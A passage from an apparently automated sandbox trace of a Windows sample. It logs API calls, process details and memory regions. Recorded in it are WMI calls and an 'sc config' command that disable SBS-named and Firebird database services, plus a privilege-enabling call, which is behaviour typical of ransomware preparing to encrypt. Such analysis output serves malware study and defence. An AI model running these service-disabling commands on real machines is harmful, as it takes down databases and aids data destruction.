[0124.045] lstrlenW (lpString="In") returned 2 [0124.045] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0124.045] SafeArrayGetElement (in: psa=0x62f2f0, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.045] lstrlenW (lpString="true") returned 4 [0124.045] lstrlenW (lpString="True") returned 4 [0124.045] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0124.045] IUnknown:Release (This=0x6528b0) returned 0x1 [0124.045] SafeArrayGetElement (in: psa=0x62f320, rgIndices=0x3aef9c, pv=0x3aefbc | out: pv=0x3aefbc) returned 0x0 [0124.045] IWbemClassObject:Get (in: This=0x652be8, wszName="Name", lFlags=0, pVal=0x3aef64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x622644, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef64*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.046] IWbemClassObject:Get (in: This=0x652be8, wszName="QualifierValue", lFlags=0, pVal=0x3aef3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f2f0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3aef3c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x62f350*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x622df8, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0124.046] SafeArrayGetLBound (in: psa=0x62f350, nDim=0x1, plLbound=0x3aef80 | out: plLbound=0x3aef80) returned 0x0 [0124.046] SafeArrayGetUBound (in: psa=0x62f350, nDim=0x1, plUbound=0x3aef60 | out: plUbound=0x3aef60) returned 0x0 [0124.046] lstrlenW (lpString="CIMTYPE") returned 7 [0124.046] lstrlenW (lpString="ValueMap") returned 8 [0124.046] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0124.046] lstrlenW (lpString="read") returned 4 [0124.046] lstrlenW (lpString="ValueMap") returned 8 [0124.046] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0124.046] lstrlenW (lpString="write") returned 5 [0124.046] lstrlenW (lpString="ValueMap") returned 8 [0124.046] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0124.046] lstrlenW (lpString="In") returned 2 [0124.046] lstrlenW (lpString="ValueMap") returned 8 [0124.046] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0124.046] lstrlenW (lpString="Out") returned 3 [0124.046] lstrlenW (lpString="ValueMap") returned 8 [0124.046] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0124.046] SafeArrayGetElement (in: psa=0x62f350, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.046] SafeArrayGetElement (in: psa=0x62f350, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.046] SafeArrayGetElement (in: psa=0x62f350, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.046] SafeArrayGetElement (in: psa=0x62f350, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.046] SafeArrayGetElement (in: psa=0x62f350, rgIndices=0x3aefa8, pv=0x3aefb0 | out: pv=0x3aefb0) returned 0x0 [0124.046] SysStringLen (param_1="ValueMap") returned 0x8 [0124.046] SysStringLen (param_1="In") returned 0x2 [0124.046] SysStringLen (param_1="In") returned 0x2 [0124.046] SysStringLen (param_1="ValueMap") returned 0x8 [0124.046] IUnknown:Release (This=0x652be8) returned 0x1 [0124.047] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.047] IUnknown:Release (This=0x6525f8) returned 0x1 [0124.047] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.047] lstrlenW (lpString="/") returned 1 [0124.047] lstrlenW (lpString="Disabled") returned 8 [0124.047] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0124.047] lstrlenW (lpString="-") returned 1 [0124.047] lstrlenW (lpString="Disabled") returned 8 [0124.047] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0124.047] lstrlenW (lpString="Disabled") returned 8 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0124.048] lstrlenW (lpString="CREATE") returned 6 [0124.048] lstrlenW (lpString="CALL") returned 4 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0124.048] lstrlenW (lpString="LIST") returned 4 [0124.048] lstrlenW (lpString="CALL") returned 4 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0124.048] lstrlenW (lpString="ASSOC") returned 5 [0124.048] lstrlenW (lpString="CALL") returned 4 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0124.048] WbemLocator:IUnknown:AddRef (This=0x5f74f0) returned 0x3 [0124.048] lstrlenW (lpString="") returned 0 [0124.048] lstrlenW (lpString="LHNIWSJ") returned 7 [0124.048] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0124.048] lstrlenW (lpString="LHNIWSJ") returned 7 [0124.048] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x819100*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0124.048] CloseHandle (hObject=0x270) returned 1 [0124.049] lstrlenW (lpString="GET") returned 3 [0124.049] lstrlenW (lpString="CALL") returned 4 [0124.049] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0124.049] lstrlenW (lpString="LIST") returned 4 [0124.049] lstrlenW (lpString="CALL") returned 4 [0124.049] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0124.049] lstrlenW (lpString="SET") returned 3 [0124.049] lstrlenW (lpString="CALL") returned 4 [0124.049] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0124.049] lstrlenW (lpString="CALL") returned 4 [0124.049] lstrlenW (lpString="CALL") returned 4 [0124.049] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0124.049] ??0CHString@@QAE@XZ () returned 0x3afa74 [0124.049] GetCurrentThreadId () returned 0xc34 [0124.049] SysStringLen (param_1="\\\\") returned 0x2 [0124.049] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0124.049] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0124.049] SysStringLen (param_1="\\") returned 0x1 [0124.049] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0124.049] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0124.050] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f74f0, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x620630) returned 0x0 [0124.058] CoSetProxyBlanket (pProxy=0x620630, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0124.058] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.058] ??0CHString@@QAE@XZ () returned 0x3afa70 [0124.058] GetCurrentThreadId () returned 0xc34 [0124.058] lstrlenA (lpString="") returned 0 [0124.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x8111a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.058] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0124.058] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0124.058] IWbemServices:GetObject (in: This=0x620630, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x3afa48*=0x0, ppCallResult=0x0 | out: ppObject=0x3afa48*=0x67adc8, ppCallResult=0x0) returned 0x0 [0124.089] IWbemClassObject:GetMethod (in: This=0x67adc8, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x3afa54, ppOutSignature=0x3afa40 | out: ppInSignature=0x3afa54*=0x67b2b8, ppOutSignature=0x3afa40*=0x67b638) returned 0x0 [0124.089] IWbemClassObject:SpawnInstance (in: This=0x67b2b8, lFlags=0, ppNewInstance=0x3afa60 | out: ppNewInstance=0x3afa60*=0x67b830) returned 0x0 [0124.089] SafeArrayGetLBound (in: psa=0x62f260, nDim=0x1, plLbound=0x3afa10 | out: plLbound=0x3afa10) returned 0x0 [0124.089] SafeArrayGetUBound (in: psa=0x62f260, nDim=0x1, plUbound=0x3afa58 | out: plUbound=0x3afa58) returned 0x0 [0124.089] SafeArrayGetElement (in: psa=0x62f260, rgIndices=0x3afa4c, pv=0x3afa74 | out: pv=0x3afa74) returned 0x0 [0124.089] IWbemClassObject:GetPropertyQualifierSet (in: This=0x67b830, wszProperty="StartMode", ppQualSet=0x3af934 | out: ppQualSet=0x3af934*=0x62ddc0) returned 0x0 [0124.089] IWbemQualifierSet:Get (in: This=0x62ddc0, wszName="CIMTYPE", lFlags=0, pVal=0x3af904*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x3af904*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0124.090] IWbemQualifierSet:Get (in: This=0x62ddc0, wszName="read", lFlags=0, pVal=0x3af91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x3af91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0124.090] IWbemQualifierSet:Get (in: This=0x62ddc0, wszName="write", lFlags=0, pVal=0x3af91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x3af91c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0124.090] IWbemQualifierSet:Get (in: This=0x62ddc0, wszName="Description", lFlags=0, pVal=0x3af8f4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x3af8f4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0124.090] lstrlenA (lpString="Not Available") returned 13 [0124.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x819270, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0124.090] IUnknown:Release (This=0x62ddc0) returned 0x0 [0124.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0124.090] SysStringLen (param_1="In") returned 0x2 [0124.090] SysStringLen (param_1="MaxLen") returned 0x6 [0124.090] SysStringLen (param_1="ValueMap") returned 0x8 [0124.090] SysStringLen (param_1="MaxLen") returned 0x6 [0124.090] SysStringLen (param_1="MaxLen") returned 0x6 [0124.090] SysStringLen (param_1="ValueMap") returned 0x8 [0124.090] lstrlenW (lpString="") returned 0 [0124.090] lstrlenW (lpString="STRING") returned 6 [0124.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0124.090] lstrlenW (lpString="string") returned 6 [0124.090] lstrlenW (lpString="STRING") returned 6 [0124.090] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0124.091] SysStringLen (param_1="In") returned 0x2 [0124.091] SysStringLen (param_1="ValueMap") returned 0x8 [0124.091] SysStringLen (param_1="ValueMap") returned 0x8 [0124.091] SysStringLen (param_1="ValueMap") returned 0x8 [0124.091] SysStringLen (param_1="ValueMap") returned 0x8 [0124.091] SysStringLen (param_1="ValueMap") returned 0x8 [0124.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0124.091] lstrlenW (lpString="System") returned 6 [0124.091] lstrlenW (lpString="Disabled") returned 8 [0124.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0124.091] lstrlenW (lpString="Automatic") returned 9 [0124.091] lstrlenW (lpString="Disabled") returned 8 [0124.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0124.091] lstrlenW (lpString="Manual") returned 6 [0124.091] lstrlenW (lpString="Disabled") returned 8 [0124.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0124.091] lstrlenW (lpString="Disabled") returned 8 [0124.091] lstrlenW (lpString="Disabled") returned 8 [0124.091] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0124.091] IWbemClassObject:GetPropertyQualifierSet (in: This=0x67b830, wszProperty="StartMode", ppQualSet=0x3af93c | out: ppQualSet=0x3af93c*=0x62db58) returned 0x0 [0124.091] IWbemQualifierSet:Get (in: This=0x62db58, wszName="CIMTYPE", lFlags=0, pVal=0x3af920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x3af920*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0124.091] IWbemClassObject:Get (in: This=0x67b830, wszName="StartMode", lFlags=0, pVal=0x3af910*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3af930*=3864240, plFlavor=0x0 | out: pVal=0x3af910*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x3af930*=8, plFlavor=0x0) returned 0x0 [0124.092] IUnknown:Release (This=0x62db58) returned 0x0 [0124.092] lstrlenW (lpString="string") returned 6 [0124.092] lstrlenW (lpString="string") returned 6 [0124.092] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0124.092] IWbemClassObject:Put (This=0x67b830, wszName="StartMode", lFlags=0, pVal=0x3af9d4*(varType=0x8, wReserved1=0x802, wReserved2=0x144, wReserved3=0x63, varVal1="Disabled", varVal2=0x1305558), Type=0) returned 0x0 [0124.092] IUnknown:Release (This=0x67b2b8) returned 0x0 [0124.092] IUnknown:Release (This=0x67b638) returned 0x0 [0124.093] ??0CHString@@QAE@XZ () returned 0x3af920 [0124.093] GetCurrentThreadId () returned 0xc34 [0124.093] lstrlenA (lpString="") returned 0 [0124.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x819c28, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.093] lstrlenA (lpString="") returned 0 [0124.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x819c28, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0124.093] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0124.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0124.093] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0124.093] lstrlenA (lpString="SELECT * FROM ") returned 14 [0124.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x819c28, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0124.094] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0124.094] SysStringLen (param_1="Win32_Service") returned 0xd [0124.094] lstrlenA (lpString=" WHERE ") returned 7 [0124.094] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x818d70, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0124.094] SysStringLen (param_1=" WHERE ") returned 0x7 [0124.094] SysStringLen (param_1="caption LIKE '%SBS%'") returned 0x14 [0124.094] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0124.094] SysStringLen (param_1=" WHERE caption LIKE '%SBS%'") returned 0x1b [0124.094] IWbemServices:ExecQuery (in: This=0x620630, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SBS%'", lFlags=48, pCtx=0x0, ppEnum=0x3af928 | out: ppEnum=0x3af928*=0x67bf58) returned 0x0 [0124.104] CoSetProxyBlanket (pProxy=0x67bf58, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0124.167] IEnumWbemClassObject:Next (in: This=0x67bf58, lTimeout=-1, uCount=0x1, apObjects=0x3af92c, puReturned=0x3af918 | out: apObjects=0x3af92c*=0x0, puReturned=0x3af918*=0x0) returned 0x1 [0124.558] IUnknown:Release (This=0x67bf58) returned 0x0 [0124.560] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.560] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.560] GetCurrentThreadId () returned 0xc34 [0124.560] ??0CHString@@QAE@PBG@Z () returned 0x3afae4 [0124.560] ??YCHString@@QAEABV0@PBG@Z () returned 0x3afae4 [0124.560] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x81a0b0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0124.560] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0124.560] __iob_func () returned 0x77ac1208 [0124.560] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0124.561] __iob_func () returned 0x77ac1208 [0124.561] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0124.561] ??1CHString@@QAE@XZ () returned 0x1 [0124.561] IUnknown:Release (This=0x620630) returned 0x0 [0124.562] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0124.562] _kbhit () returned 0x0 [0124.563] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0124.563] WbemLocator:IUnknown:Release (This=0x5f74f0) returned 0x2 [0124.563] IUnknown:Release (This=0x620ae0) returned 0x0 [0124.563] IUnknown:Release (This=0x6205e0) returned 0x0 [0124.564] WbemLocator:IUnknown:Release (This=0x5f74f0) returned 0x1 [0124.564] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0124.564] WbemLocator:IUnknown:Release (This=0x5f74f0) returned 0x0 [0124.575] ??1CHString@@QAE@XZ () returned 0x74a66430 [0124.575] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 334 os_tid = 0xc50 Thread: id = 335 os_tid = 0xc48 Thread: id = 336 os_tid = 0xcd8 Thread: id = 337 os_tid = 0xcd4 Process: id = "79" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3d87c000" os_pid = "0xcc8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config FirebirdServerDefaultInstance start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5163 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5164 start_va = 0x510000 end_va = 0x450ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 5165 start_va = 0x4510000 end_va = 0x452ffff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 5166 start_va = 0x4530000 end_va = 0x4531fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5167 start_va = 0x4540000 end_va = 0x4553fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004540000" filename = "" Region: id = 5168 start_va = 0x4560000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 5169 start_va = 0x45a0000 end_va = 0x469ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 5170 start_va = 0x46a0000 end_va = 0x46a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046a0000" filename = "" Region: id = 5171 start_va = 0x46b0000 end_va = 0x46b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000046b0000" filename = "" Region: id = 5172 start_va = 0x46c0000 end_va = 0x46c1fff entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 5173 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5174 start_va = 0x7ef70000 end_va = 0x7ef92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef70000" filename = "" Region: id = 5175 start_va = 0x7ef9a000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef9a000" filename = "" Region: id = 5176 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 5177 start_va = 0x7ef9e000 end_va = 0x7ef9efff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 5178 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5179 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5180 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5181 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5182 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5183 start_va = 0x4820000 end_va = 0x482ffff entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 5184 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5185 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5186 start_va = 0x49d0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 5187 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5228 start_va = 0x4510000 end_va = 0x451ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 5229 start_va = 0x46d0000 end_va = 0x478dfff entry_point = 0x46d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5230 start_va = 0x4790000 end_va = 0x47cffff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 5231 start_va = 0x4830000 end_va = 0x492ffff entry_point = 0x0 region_type = private name = 